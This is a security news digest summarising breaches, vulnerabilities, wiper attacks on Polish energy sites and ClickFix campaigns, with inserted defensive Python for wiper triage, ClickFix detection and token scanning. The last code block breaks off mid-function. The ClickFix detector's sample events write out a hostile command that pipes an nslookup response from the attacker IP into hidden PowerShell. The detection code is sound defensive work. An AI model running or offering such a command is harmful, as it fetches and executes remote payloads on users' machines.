Cogent Security Secures $42M for AI-Driven Vulnerability Management

Updated: · First: 18.02.2026 16:47 · 📰 1 src / 1 article

Cogent Security has raised $42 million in Series A funding to develop autonomous AI agents for vulnerability remediation. The funding will accelerate product development for their agentic AI platform, which automates investigation, prioritization, and remediation tasks in vulnerability management. The platform integrates vulnerability data across environments, reduces scanner noise, and incorporates business context to prioritize risks beyond standard severity scores. The company aims to streamline security operations by automating coordination tasks, allowing security teams to focus on critical threats.

Figure Fintech Breach Exposes 967,200 Accounts via Social Engineering

Updated: · First: 18.02.2026 16:01 · 📰 1 src / 1 article

Figure Technology Solutions, a blockchain-based fintech firm, suffered a data breach affecting nearly 1 million accounts. Hackers stole personal and contact information through a social engineering attack. The breach was attributed to the ShinyHunters extortion group, which leaked 2.5GB of data from loan applicants. The attackers impersonated IT support to trick employees into providing access to SSO accounts, gaining entry to various enterprise applications.

Critical vulnerabilities in popular VSCode extensions enable RCE and file theft

Updated: 18.02.2026 15:16 · First: 17.02.2026 23:27 · 📰 2 src / 2 articles

Multiple high-to-critical severity vulnerabilities in popular VSCode extensions, collectively downloaded over 125 million times, expose developers to remote code execution (RCE) and file theft. The affected extensions include Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview. Researchers at Ox Security discovered these flaws in June 2025 but received no response from maintainers. Exploitation could lead to lateral movement, data exfiltration, and system takeover in corporate environments. Microsoft silently fixed the Live Preview vulnerability in version 0.4.16 released in September 2025.

Microsoft 365 Copilot Bug Bypasses DLP Policies for Confidential Emails

Updated: · First: 18.02.2026 14:03 · 📰 1 src / 1 article

A bug in Microsoft 365 Copilot has been causing the AI assistant to summarize confidential emails since late January, bypassing data loss prevention (DLP) policies. The issue affects the Copilot 'work tab' chat feature, which incorrectly reads and summarizes emails stored in users' Sent Items and Drafts folders, including messages with confidentiality labels. Microsoft confirmed the bug and began rolling out a fix in early February, but the full remediation timeline and scope of impact remain undisclosed.

Cybersecurity Adaptations for Permanent Instability in 2026

Updated: · First: 18.02.2026 13:58 · 📰 1 src / 1 article

In 2026, cybersecurity is characterized by continuous instability driven by AI threats, regulatory pressures, and geopolitical tensions. Organizations are shifting from reactive security measures to structural reinforcements that ensure operational continuity. Key trends include integrating regulatory and geopolitical considerations into cybersecurity architecture, making attack surfaces unreliable through dynamic defenses, and leveraging AI to accelerate security operations. Security is becoming a lifecycle discipline across digital ecosystems, with Zero Trust evolving into continuous decision-making and adaptive control. Data security and privacy engineering are essential for scalable AI, and post-quantum risk is making crypto agility a design requirement.

Ransomware Victims and Groups Reach Record Highs in 2025

Updated: · First: 18.02.2026 13:30 · 📰 1 src / 1 article

In 2025, ransomware victims listed on extortion sites surged by 30% annually, reaching 7,458. The number of active ransomware groups also hit a new high of 124, with 73 new groups identified. AI is lowering the barrier to entry for new threat groups, aiding in social engineering, data analysis, and ransomware negotiations. Despite the increase in victims, ransom payments fell by 35% in 2024, and this trend is likely to have continued in 2025. The ransomware ecosystem remains professionalized and effective, with large syndicates fracturing into smaller, agile cells, making the threat landscape more complex.

Darknet Drug Ring Operators Sentenced in U.S. Federal Court

Updated: · First: 18.02.2026 12:50 · 📰 1 src / 1 article

A Glendale man, Davit Avalyan, was sentenced to 57 months in federal prison for his role in a darknet drug trafficking operation that distributed cocaine, methamphetamine, MDMA, and ketamine across the United States. The operation, which ran from 2018 to 2025, involved multiple darknet vendor accounts and was dismantled by the FBI's JCODE task force. Avalyan is the last of four defendants to be sentenced in this case, with his accomplices receiving sentences ranging from 24 to 120 months. The group used various darknet marketplaces to sell drugs and shipped them via the U.S. Postal Service.

Automated Workflows for Security and IT Operations

Updated: · First: 18.02.2026 12:30 · 📰 1 src / 1 article

Security and IT teams are leveraging intelligent workflows to automate phishing response, IT service requests, and vulnerability management. These workflows integrate automation, AI-driven decisioning, and human oversight to streamline operations and reduce manual workloads. The workflows use existing tools like VirusTotal, URLScan.io, Sublime Security, Slack, and Tenable to automate tasks such as phishing email analysis, IT service request processing, and vulnerability monitoring. These solutions aim to free up teams to focus on higher-value work while ensuring governance and scalability.

Chinese APT Group Exploits Dell Zero-Day for Two Years

Updated: · First: 18.02.2026 12:10 · 📰 1 src / 1 article

A Chinese APT group, identified as UNC6201, has been exploiting a critical zero-day vulnerability (CVE-2026-22769) in Dell's RecoverPoint for Virtual Machines since mid-2024. The flaw, a hardcoded credential bug with a CVSS score of 10.0, allows unauthenticated attackers to gain root-level access and maintain persistence. The group has used this vulnerability to deploy malware, including Slaystyle, Brickstorm, and a new backdoor called Grimbolt. Mandiant has also observed novel tactics such as creating ghost NICs and using iptables for single packet authorization (SPA).

Notepad++ Update Mechanism Exploited to Deliver Malicious Payloads

Updated: 18.02.2026 09:40 · First: 11.12.2025 23:04 · 📰 6 src / 7 articles

Notepad++ version 8.8.9 was released to address a security flaw in its WinGUp update tool that allowed attackers to push malicious executables instead of legitimate updates. Users reported incidents where the updater spawned a malicious AutoUpdater.exe that collected device information and exfiltrated it to a remote site. The flaw was mitigated by enforcing updates only from GitHub and later by requiring signature verification for all updates. Security researchers noted targeted attacks against organizations with interests in East Asia, where Notepad++ processes were used to gain initial access. The attack involved an infrastructure-level compromise at the hosting provider level, allowing malicious actors to intercept and redirect update traffic. The incident commenced in June 2025 and continued until December 2025, with the Notepad++ website later migrated to a new hosting provider. The attackers were likely Chinese state-sponsored threat actors, selectively redirecting update requests from certain users to malicious servers. The hosting provider for the update feature was compromised, enabling targeted traffic redirections. The attackers regained access using previously obtained internal service credentials. Notepad++ has since migrated all clients to a new hosting provider with stronger security and plans to enforce mandatory certificate signature verification in version 8.9.2. The compromise involved shared hosting infrastructure rather than a flaw in the software's code, with attackers gaining access at the hosting provider level to intercept and manipulate traffic bound for the Notepad++ update endpoint. Direct server access by the attackers ended on September 2, 2025, but credentials associated with internal services remained exposed until December 2, 2025, allowing continued traffic redirection. The hosting provider confirmed no additional customers were affected. 
Notepad++ version 8.9.2 introduced a 'double-lock' design for its update mechanism, including verifying the signed installer from GitHub and checking the signed XML from the notepad-plus-plus.org domain. The auto-updater now removes libcurl.dll to eliminate DLL side-loading risk, removes unsecured cURL SSL options, and restricts plugin management execution to programs signed with the same certificate as WinGUp. Users can exclude the auto-updater during UI installation or deploy the MSI package with the NOUPDATER=1 flag. The threat group Lotus Blossom, linked to China, was involved in the compromise, using a custom backdoor called 'Chrysalis' as part of the attack chain. Notepad++ version 8.9.2 also addresses a high-severity vulnerability (CVE-2026-25926, CVSS score: 7.3) that could result in arbitrary code execution in the context of the running application. An Unsafe Search Path vulnerability (CWE-426) exists when launching Windows Explorer without an absolute executable path, which may allow execution of a malicious explorer.exe if an attacker can control the process working directory.

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

Updated: 18.02.2026 08:52 · First: 09.02.2026 10:03 · 📰 7 src / 11 articles

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability. Attackers have begun actively exploiting the CVE-2026-1731 vulnerability in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel. A proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. CISA has added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog and ordered U.S. government agencies to secure their systems against the flaw by February 16, 2026. CISA also added four other vulnerabilities to its KEV catalog, including CVE-2026-2441, CVE-2024-7694, CVE-2020-7796, and CVE-2008-0015. CVE-2026-2441 is a use-after-free vulnerability in Google Chrome with a CVSS score of 8.8. 
CVE-2024-7694 is an arbitrary file upload vulnerability in TeamT5 ThreatSonar Anti-Ransomware versions 3.4.5 and earlier with a CVSS score of 7.2. CVE-2020-7796 is a server-side request forgery (SSRF) vulnerability in Synacor Zimbra Collaboration Suite (ZCS) with a CVSS score of 9.8. CVE-2008-0015 is a stack-based buffer overflow vulnerability in Microsoft Windows Video ActiveX Control with a CVSS score of 8.8. Google acknowledged that an exploit for CVE-2026-2441 exists in the wild. A report published by threat intelligence firm GreyNoise in March 2025 revealed that a cluster of about 400 IP addresses was actively exploiting multiple SSRF vulnerabilities, including CVE-2020-7796, to target susceptible instances in the U.S., Germany, Singapore, India, Lithuania, and Japan. The exploit for CVE-2008-0015 may connect to a remote server and download other malware, including the Dogkild worm. Federal Civilian Executive Branch (FCEB) agencies are recommended to apply the necessary fixes by March 10, 2026, for optimal protection.

Spanish Court Orders NordVPN and ProtonVPN to Block LaLiga Piracy Streams

Updated: 18.02.2026 01:15 · First: 18.02.2026 01:15 · 📰 2 src / 2 articles

A Spanish court has ordered NordVPN and ProtonVPN to block 16 websites facilitating piracy of LaLiga football matches. The order applies to a dynamic list of IP addresses in Spain and was issued without a hearing. LaLiga and Telefónica must preserve digital evidence of unlawful transmissions. The ruling aligns with similar decisions in France and recognizes VPN providers' liability for piracy. Both VPN providers have questioned the decision's validity and process. LaLiga has previously targeted Cloudflare for facilitating illegal sports streaming and demonstrated that VPN providers fall under the EU Digital Services Regulation. NordVPN criticized the blocking approach, suggesting that hosting providers should be targeted instead, and noted that free VPN services remain a loophole for piracy.

Russian Threat Actors Target Ukrainian and Polish Organizations with Data-Wiping Malware and LotL Tactics

Updated: 17.02.2026 23:31 · First: 29.10.2025 13:51 · 📰 12 src / 20 articles

Russian threat actors, specifically the Sandworm group, have targeted Ukrainian organizations and Poland's power sector using living-off-the-land (LotL) tactics and deploying data-wiping malware. The attacks, which began in June 2025, involved minimal malware to reduce detection and included the use of web shells and legitimate tools for reconnaissance and data theft. The threat actors exploited unpatched vulnerabilities to deploy web shells on public-facing servers, gaining initial access. They then used various tactics, including PowerShell commands, scheduled tasks, and legitimate software, to evade detection and perform reconnaissance. The attacks were characterized by the use of legitimate tools and minimal malware, demonstrating the actors' deep knowledge of Windows native tools. In addition to LotL tactics, Sandworm deployed multiple data-wiping malware families in June and September 2025, targeting Ukraine's education, government, and grain sectors. The grain sector, a vital economic sector, was targeted to disrupt Ukraine's war economy. The data-wiping malware used included ZeroLot and Sting, with initial access achieved by UAC-0099, who then transferred access to APT44 for wiper deployment. The activity is confirmed to be of Russian origin, with specific attribution to the Sandworm group. In December 2025, Sandworm targeted Poland's power sector with a new wiper malware called DynoWiper, aiming to disrupt the energy infrastructure. The attack, which occurred on December 29 and 30, 2025, targeted two combined heat and power (CHP) plants and a system managing renewable energy sources. The attack was unsuccessful in causing disruption, and Polish authorities attributed it to Russian services. The attack coincided with the tenth anniversary of Sandworm's 2015 attack on Ukraine's power grid. A new Russia-aligned threat activity cluster, InedibleOchotense, impersonated ESET in phishing attacks targeting Ukrainian entities starting in May 2025. 
This campaign involved sending spear-phishing emails and Signal text messages containing links to trojanized ESET installers, which delivered the Kalambur backdoor. InedibleOchotense is linked to the Sandworm (APT44) hacking group and has been observed conducting destructive campaigns in Ukraine, including the deployment of wiper malware ZEROLOT and Sting. Another Russia-aligned threat actor, RomCom, launched spear-phishing campaigns in mid-July 2025 exploiting a WinRAR vulnerability (CVE-2025-8088) targeting various sectors in Europe and Canada. RomCom also targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. The targeted entity had worked for a city with close ties to Ukraine in the past. The ESET report noted that other Russian-aligned APT groups also maintained their focus on Ukraine and countries with strategic ties to Ukraine, while also expanding their operations to European entities. Gamaredon remained the most active APT group targeting Ukraine, with a noticeable increase in intensity and frequency of its operations during the reported period. Gamaredon selectively deployed one of Turla’s backdoors, indicating a rare instance of cooperation between Russia-aligned APT groups. Gamaredon’s toolset continued to evolve, incorporating new file stealers or tunneling services. The cyber attack on the Polish power grid in December 2025 was attributed with medium confidence to a Russian state-sponsored hacking group known as ELECTRUM. The attack targeted distributed energy resources (DERs) and affected communication and control systems at combined heat and power (CHP) facilities and systems managing renewable energy systems. 
ELECTRUM and KAMACITE share overlaps with the Sandworm cluster, with KAMACITE focusing on initial access and ELECTRUM conducting operations that bridge IT and OT environments. The attackers gained access to operational technology systems critical to grid operations and disabled key equipment beyond repair at the site. The attack was opportunistic and rushed, with the hackers attempting to inflict as much damage as possible by wiping Windows-based devices and resetting configurations. The majority of the equipment targeted was related to grid safety and stability monitoring. The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems, damaging "key equipment beyond repair," they failed to disrupt power generation totaling 1.2 GW, or 5% of Poland's energy supply. Based on public reports, there are at least 12 confirmed affected sites; however, researchers at Dragos, a critical infrastructure (OT) and industrial control systems (ICS) security company, say that the number is approximately 30. Dragos attributes the attack with moderate confidence to a Russian threat actor it tracks as Electrum; although Electrum overlaps with Sandworm (APT44), the researchers underline that it is a distinct activity cluster. Electrum targeted exposed and vulnerable systems involved in dispatch and grid-facing communication, remote terminal units (RTUs), network edge devices, monitoring and control systems, and Windows-based machines at DER sites. Electrum successfully disabled communications equipment at multiple sites, resulting in a loss of remote monitoring and control, but power generation on the units continued without interruption.
Certain OT/ICS devices were disabled, and their configurations were corrupted beyond recovery, while Windows systems at the sites were wiped. Even if the attacks had been successful in cutting the power, the relatively narrow targeting scope wouldn’t have been enough to cause a nationwide blackout in Poland. However, they could have caused significant destabilization of the system frequency. "Such frequency deviations have caused cascading failures in other electrical systems, including the 2025 Iberian grid collapse," the researchers say. CERT Polska revealed that coordinated cyber attacks targeted more than 30 wind and photovoltaic farms, a private company from the manufacturing sector, and a large combined heat and power plant (CHP) in Poland on December 29, 2025. The attacks were attributed to a threat cluster dubbed Static Tundra, which is linked to Russia's Federal Security Service's (FSB) Center 16 unit. The attacks had a purely destructive objective but did not affect the ongoing production of electricity or the heat supply to end users. The attackers gained access to the internal network of power substations associated with a renewable energy facility to carry out reconnaissance and disruptive activities, including damaging the firmware of controllers, deleting system files, or launching custom-built wiper malware codenamed DynoWiper. In the intrusion aimed at the CHP, the adversary engaged in long-term data theft dating back to March 2025, enabling them to escalate privileges and move laterally across the network. The attackers' attempts to detonate the wiper malware were unsuccessful. The targeting of the manufacturing sector company is believed to be opportunistic, with the threat actor gaining initial access via a vulnerable Fortinet perimeter device. At least four different versions of DynoWiper have been discovered to date. 
The wiper's functionality involves initializing a pseudorandom number generator (PRNG) called Mersenne Twister, enumerating files and corrupting them using the PRNG, and deleting files. The malware does not have a persistence mechanism, a way to communicate with a command-and-control (C2) server, or execute shell commands, and it does not attempt to hide the activity from security programs. The attack targeting the manufacturing sector company involved the use of a PowerShell-based wiper dubbed LazyWiper that scripts overwrites files on the system with pseudorandom 32-byte sequences to render them unrecoverable. The malware used in the incident involving renewable energy farms was executed directly on the HMI machine. In the CHP plant and the manufacturing sector company, the malware was distributed within the Active Directory domain via a PowerShell script executed on a domain controller. The attacker used credentials obtained from the on-premises environment in attempts to gain access to cloud services, downloading selected data from services such as Exchange, Teams, and SharePoint. The attacker was particularly interested in files and email messages related to OT network modernization, SCADA systems, and technical work carried out within the organizations. The attack on Poland's energy sector in December 2025 was the first large-scale attack against decentralized energy resources (DERs) like wind turbines and solar farms. The attack occurred during a period when Poland was struggling with low temperatures and snowstorms just before the New Year. Dragos assessed with moderate confidence that the activity reflects tradecraft and objectives in line with the Electrum threat group, which overlaps with Sandworm. Electrum has worked alongside another threat actor, tracked as Kamicite, to conduct destructive attacks against Ukrainian ISPs and persistent scanning of industrial devices in the US. 
Kamicite gained initial access and persistence against organizations, and Electrum executed follow-on activity. Dragos has tracked Kamicite activities against the European ICS/OT supply chain since late 2024. The attack on Poland's energy sector was significant because it was the first major attack against decentralized energy resources (DERs). There was no evidence that the adversary had full control of the DERs, and there was no attempt to mis-operate these resources. Poland was fortunate because DERs make up a smaller portion of its energy portfolio than some other countries. If this same style of attack happened in the US, Australia, or certain parts of Europe where DERs are more prevalent, it could have been potentially catastrophic for the system. The attack highlighted the ongoing threat faced by the energy sector, with threat actors gaining initial access through vulnerable Internet-facing edge devices before deploying wipers that damaged remote terminal units (RTUs). CISA advised OT operators to prioritize updates that allow firmware verification and to immediately change default passwords on things like edge devices. Dragos recommended that organizations ensure architecture is defensible through methods like strict authorization practices, OT/IT segmentation, strict vendor access governance, secure remote access, and ICS network visibility and monitoring.
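The DynoWiper and LazyWiper descriptions above (PRNG output written over files, 32-byte pseudorandom sequences) suggest a first-pass triage heuristic for responders: a file whose leading bytes are random-looking and carry no recognisable format header is a candidate for wiper damage. The Python below is an added example, not code from CERT Polska, Dragos or this page. It assumes the overwrite begins at offset 0 (the page does not state where the wipers write), and the sample files, the magic-byte list and the entropy threshold are this example's own choices.

```python
"""Forensic triage helper for files hit by a PRNG-output wiper.

Added example, not code from CERT Polska, Dragos or the page. Assumption:
the wiper's overwrite starts at offset 0, so a file whose leading bytes are
high-entropy and headerless is a candidate for wiping.
"""
import math
import os
from collections import Counter

# Magic bytes of formats whose bodies are legitimately high-entropy; a file
# starting with one of these is not flagged even if the rest looks random.
KNOWN_MAGIC = (
    b"%PDF", b"PK\x03\x04", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff",
    b"MZ", b"\x7fELF", b"GIF8", b"\x1f\x8b", b"7z\xbc\xaf\x27\x1c",
)
WINDOW = 32        # bytes examined, matching LazyWiper's 32-byte writes
THRESHOLD = 4.6    # bits/byte; 32 distinct random bytes score 5.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def has_known_magic(data: bytes) -> bool:
    return any(data.startswith(m) for m in KNOWN_MAGIC)


def looks_wiped(data: bytes) -> bool:
    """True if the first WINDOW bytes are random-looking and headerless."""
    head = data[:WINDOW]
    if len(head) < 16:              # too little data to judge
        return False
    if has_known_magic(head):
        return False
    return shannon_entropy(head) >= THRESHOLD


def triage(files: dict) -> list:
    """Return names of files in {name: bytes} that look wiped, sorted."""
    return sorted(name for name, blob in files.items() if looks_wiped(blob))


def triage_dir(root: str) -> list:
    """Walk `root` and return paths whose leading WINDOW bytes look wiped."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    if looks_wiped(fh.read(WINDOW)):
                        hits.append(path)
            except OSError:
                continue                # unreadable file: skip, do not crash triage
    return sorted(hits)


# Constructed sample set; bytes(range(32)) stands in for PRNG output.
SAMPLE_FILES = {
    "schedule.txt": b"Quarterly maintenance schedule f" + b"or the wind farm RTUs.\n",
    "report.pdf": b"%PDF-1.7\n" + bytes(range(23)),       # high-entropy body, valid header
    "config.xml": bytes(range(32)) + b"<config/>",        # header overwritten
    "tiny.ini": b"[main]\n",                              # too short to judge
}

if __name__ == "__main__":
    for name in triage(SAMPLE_FILES):
        print("possible wiper damage:", name)
```

Run `triage_dir()` against a mounted image of a wiped host to get a candidate list for deeper inspection. The heuristic only catches files whose header was overwritten; a file that kept its magic bytes but was corrupted further in will pass, so treat the output as a starting point, not a verdict.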

UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

Updated: 17.02.2026 19:03 · First: 21.08.2025 19:25 · 📰 27 src / 35 articles

Microsoft and Malwarebytes have disclosed a DNS-based ClickFix variant that marks the first documented use of the nslookup command to stage and deliver malicious payloads. The technique abuses DNS queries to retrieve a PowerShell script embedded in the NAME: field of a DNS response from an attacker-controlled server (84[.]21[.]189[.]20), which then deploys ModeloRAT via a Python runtime and a VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering (fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the nslookup command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including ConsentFix (Azure CLI OAuth abuse), CrashFix (malicious Chrome extensions triggering browser crashes), and SyncAppvPublishingServer.vbs (Google Calendar dead drops). The DNS-based approach shows the campaign's adaptability: it leverages a trusted native tool (nslookup), DNS as a C2 channel, and urgency-based psychological manipulation to bypass security controls. Concurrently, ClickFix campaigns continue to expand with cross-platform targeting (Windows, Linux, macOS), abuse of AI platforms (ChatGPT, Grok, Claude), and weaponized SaaS infrastructure (Google Groups, Pastebin) to distribute payloads such as Lumma Stealer and Odyssey Stealer. The combination of DNS staging, browser-native execution, and multi-stage loaders underscores the campaign's resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion through social engineering, steganography, and abuse of legitimate services.
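The chain above has a process-tree shape a defender can key on: an interactive parent (the Run dialog under explorer.exe, or a browser) launches nslookup with an explicit resolver that is not the organisation's DNS server, and PowerShell consumes the output. The Python below is an added example of that detection logic, not Microsoft's or Malwarebytes' rule. The Sysmon-style events are constructed for illustration; the trusted-resolver set, the command-line shapes and the `update-check.invalid` host name are assumptions, and the only value taken from the summary is the resolver IP.

```python
"""Process-tree detector for the nslookup-staged ClickFix chain.

Added example, not Microsoft's or Malwarebytes' detection logic. Events are
Sysmon-style process creations constructed here; TRUSTED_RESOLVERS and the
command lines are assumptions.
"""
import shlex
from dataclasses import dataclass

TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}          # assumed corporate DNS
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def nslookup_resolver(cmdline: str):
    """Explicit server argument of `nslookup [opts] <name> [server]`, or None."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        return None
    positional = [a for a in argv[1:] if not a.startswith("-")]
    return positional[1].strip('"') if len(positional) >= 2 else None


def interactive_ancestor(ev, by_pid, max_depth=5):
    """Nearest ancestor that is an interactive parent (Run dialog, browser)."""
    cur = ev
    for _ in range(max_depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            return None
        if basename(cur.image) in INTERACTIVE_PARENTS:
            return cur
    return None


def find_dns_clickfix(events):
    """Return one hit per nslookup process matching the ClickFix chain."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    hits = []
    for ev in events:
        if basename(ev.image) != "nslookup.exe":
            continue
        server = nslookup_resolver(ev.cmdline)
        if server is None or server in TRUSTED_RESOLVERS:
            continue                    # default or corporate resolver: benign
        origin = interactive_ancestor(ev, by_pid)
        if origin is None:
            continue                    # not launched from a user-facing surface
        # The pipeline runs inside nslookup's parent (cmd.exe), so the shell
        # that consumes the DNS response shows up as a sibling of nslookup.
        shells = [s for s in children.get(ev.ppid, []) if basename(s.image) in SHELLS]
        if shells:
            hits.append({"nslookup_pid": ev.pid, "resolver": server,
                         "origin": basename(origin.image),
                         "shell_pid": shells[0].pid})
    return hits


SAMPLE_EVENTS = [  # constructed sample telemetry
    ProcEvent(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "nslookup update-check.invalid 84.21.189.20 | powershell -nop -w hidden -"'),
    ProcEvent(2001, 2000, r"C:\Windows\System32\nslookup.exe",
              "nslookup update-check.invalid 84.21.189.20"),
    ProcEvent(2002, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -"),
    # benign: an admin's lookup from a terminal against the corporate resolver
    ProcEvent(3000, 1, r"C:\Program Files\WindowsApps\WindowsTerminal.exe", "wt.exe"),
    ProcEvent(3001, 3000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(3002, 3001, r"C:\Windows\System32\nslookup.exe",
              "nslookup -type=txt intranet.corp 10.0.0.53"),
]

if __name__ == "__main__":
    for hit in find_dns_clickfix(SAMPLE_EVENTS):
        print("nslookup ClickFix chain:", hit)
```

The three conditions (non-corporate resolver, interactive origin, sibling shell) are each common on their own; it is the conjunction that is rare, which keeps the rule quiet on help-desk troubleshooting while still firing when a user pastes the lure command into Win+R.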

Keenadu Android Backdoor Discovered in Firmware and Google Play Apps

Updated: 17.02.2026 18:41 · First: 17.02.2026 16:05 · 📰 2 src / 2 articles

A sophisticated Android malware called Keenadu has been discovered embedded in firmware from multiple device brands and distributed through various vectors, including Google Play apps. The malware provides attackers with unrestricted control over infected devices, enabling broad-range data theft and other malicious activities. As of February 2026, 13,715 devices have been confirmed infected, primarily in Russia, Japan, Germany, Brazil, and the Netherlands. The malware's capabilities include compromising all installed applications, installing any apps from APK files, and monitoring user activities, including incognito browsing. Kaspersky researchers compare Keenadu to the Triada malware family, which was found in counterfeit Android devices last year. Keenadu has been detected in Alldocube iPlay 50 mini Pro firmware dating back to August 18, 2023, and is embedded within tablet firmware with valid digital signatures. The malware has also been found in smart home camera apps on Google Play with 300,000 downloads, which are no longer available.

Android 17 Beta Introduces Secure-by-Default Architecture and Enhanced Security Features

Updated: · First: 17.02.2026 18:00 · 📰 1 src / 1 articles

Android 17 Beta introduces a secure-by-default architecture with major security updates, including the deprecation of the android:usesCleartextTraffic attribute and the addition of HPKE hybrid cryptography support. The update also brings performance improvements and changes for large-screen devices, marking a shift towards tighter default security settings, and adds a new continuous Canary channel for developers. The beta aims to strengthen app protections and improve developer workflows, with platform stability targeted for March. Developers are urged to migrate to network security configuration files for more granular control over app security.

Microsoft Teams Outage Affects Global Users with Message Delays

Updated: 17.02.2026 17:37 · First: 19.12.2025 22:04 · 📰 2 src / 2 articles

Microsoft Teams is experiencing a widespread outage causing message delays and service disruptions across all regions, including the United States and Europe. The issue began at 14:30 ET, and Microsoft has confirmed it is investigating the problem. Recovery is visible in telemetry, but the root cause remains under investigation. Users are experiencing problems joining meetings with the Teams desktop client, accessing the Teams app, and signing in. The outage is causing delays and failures when sending and receiving chat messages that include inline media (images, code snippets, videos). Microsoft is also working to resolve additional incidents affecting Teams meetings and Copilot Studio agents.

Apple Tests End-to-End Encrypted RCS Messaging in iOS 26.4 Developer Beta

Updated: 17.02.2026 17:00 · First: 17.02.2026 08:44 · 📰 2 src / 2 articles

Apple has introduced end-to-end encryption (E2EE) for Rich Communication Services (RCS) messaging in the iOS and iPadOS 26.4 Developer Beta. The feature is currently in beta and limited to Apple devices, with full rollout expected in future updates for iOS, iPadOS, macOS, and watchOS. The encryption is based on the RCS Universal Profile 3.0, which uses the Messaging Layer Security (MLS) protocol. The beta also includes enhanced memory-safety protection with Memory Integrity Enforcement (MIE) and the default activation of Stolen Device Protection for all iPhone users. Applications can now opt in to the full protections of MIE, moving beyond the previously available Soft Mode. Stolen Device Protection introduces a one-hour delay before allowing Apple Account password changes and requires biometric authentication for key security actions.

Exposed Secrets in JavaScript Bundles Across Millions of Applications

Updated: 17.02.2026 16:40 · First: 20.01.2026 12:45 · 📰 2 src / 2 articles

A study by Intruder's research team found over 42,000 exposed tokens across 334 secret types in 5 million scanned applications. These tokens, often missed by traditional vulnerability scanners, pose significant security risks, including unauthorized access to code repositories, project management tools, and other sensitive services. The exposed tokens included 688 GitHub and GitLab personal access tokens, many of which were still active and gave full access to repositories. An API key for Linear, a project management application, was also found embedded directly in front-end code, exposing the organization's entire Linear instance. Exposed secrets were also found across a wide range of other services, including CAD software APIs, email platforms, webhooks for chat and automation platforms, PDF converters, sales intelligence and analytics platforms, and link shorteners. The findings highlight the limitations of existing secrets-detection methods and underscore the need for more comprehensive scanning techniques to prevent such exposures.
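The GitHub and GitLab personal access tokens the study reports are the easiest class to catch, because both providers use fixed prefixes. The Python below is an added example of a post-build bundle scanner, not Intruder's tooling. The regexes encode the documented token formats (classic `ghp_`, fine-grained `github_pat_`, GitLab `glpat-`); the minified bundle excerpt is constructed and its token bodies are made up, not valid credentials.

```python
"""Scanner for leaked access tokens in a JavaScript bundle.

Added example, not Intruder's scanner. Patterns cover the documented
prefixes of GitHub classic and fine-grained PATs and GitLab PATs. The
bundle text below is constructed; the token bodies are fabricated.
"""
import re

PATTERNS = {
    "github_pat_classic": re.compile(r"\bghp_[A-Za-z0-9]{36}(?![A-Za-z0-9])"),
    "github_pat_fine_grained": re.compile(
        r"\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}(?![A-Za-z0-9])"),
    "gitlab_pat": re.compile(r"\bglpat-[A-Za-z0-9_-]{20}(?![A-Za-z0-9_-])"),
}
PREFIX_RE = re.compile(r"^(ghp_|github_pat_|glpat-)")
MIN_DISTINCT = 10  # placeholders like ghp_xxxx... have few distinct characters


def is_placeholder(token: str) -> bool:
    """Reject obvious dummies (docs, tests) before reporting a finding."""
    body = PREFIX_RE.sub("", token)
    return len(set(body)) < MIN_DISTINCT


def redact(token: str) -> str:
    """Keep the prefix and last 4 chars: identifiable in a report, not reusable."""
    return token[:8] + "..." + token[-4:]


def scan_bundle(text: str) -> list:
    """Return findings as (kind, line_no, redacted_token), in file order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
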